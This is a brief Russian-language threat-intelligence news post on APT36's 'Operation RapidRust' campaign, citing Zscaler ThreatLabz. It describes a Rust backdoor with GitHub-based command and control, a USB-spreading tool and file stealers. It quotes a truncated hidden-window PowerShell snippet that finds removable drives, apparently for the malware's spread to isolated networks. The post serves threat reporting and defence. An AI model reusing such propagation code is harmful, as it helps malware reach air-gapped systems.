Zscaler ThreatLabz выявил новую кампанию APT36 под названием Operation RapidRust. Группировка, связанная с Пакистаном, атакует правительственные и оборонные организации в Индии и Афганистане. APT36 обновила тактики и процедуры, используя новые вредоносные программы.
В рамках кампании обнаружены бэкдор RUSTYSHADE, инструмент пост-компрометации RUSTYMOVE и файловые стиллеры PSNATCH и BASHNATCH. RUSTYSHADE написан на Rust, использует приватные репозитории GitHub для управления и шифрует трафик с помощью AES-256-GCM. RUSTYMOVE копирует вредоносные файлы на внешние носители для распространения в изолированных сетях. PSNATCH и BASHNATCH крадут файлы с заражённых машин, отправляя их в репозитории злоумышленников.
ⓘ Что такое RUSTYSHADE
RUSTYSHADE — это новый бэкдор для Windows, написанный на языке Rust. Он использует приватные репозитории GitHub для связи с командными серверами (C2) и шифрует трафик с помощью AES-256-GCM. Злоумышленники используют его для получения контроля над заражёнными системами.
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command "
Get-Volume | Where-Object DriveLetter | ForEach-Object {
$letter = $_.DriveLetter
$part = Get-Partition -DriveLetter $letter -ErrorAction SilentlyContinue
if (-not $part) { return }
$disk = Get-Disk -Number $part.DiskNumber -ErrorAction SilentlyContinue
if (-not $disk) { return }
$external = ($disk.BusType -in @('USB','1394','SD','MMC')) -or
($disk.MediaType -in @('Removable Media','External hard disk media'))
if ($external -and $_.UniqueId) {
…
Источник: Zscaler ThreatLabz
@cbunit